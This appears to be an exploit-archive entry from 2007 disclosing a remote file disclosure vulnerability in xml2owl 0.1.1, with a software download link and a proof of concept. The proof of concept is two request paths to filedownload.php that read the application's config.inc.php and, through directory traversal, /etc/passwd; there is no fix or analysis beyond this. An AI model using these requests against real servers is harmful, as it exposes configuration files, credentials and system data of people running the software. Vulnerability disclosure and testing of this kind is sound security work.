id: 2362
date: 12/13/2007
title: xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

=====================================================================
xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
=====================================================================



xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd



#  0day.today [2023-03-25]  #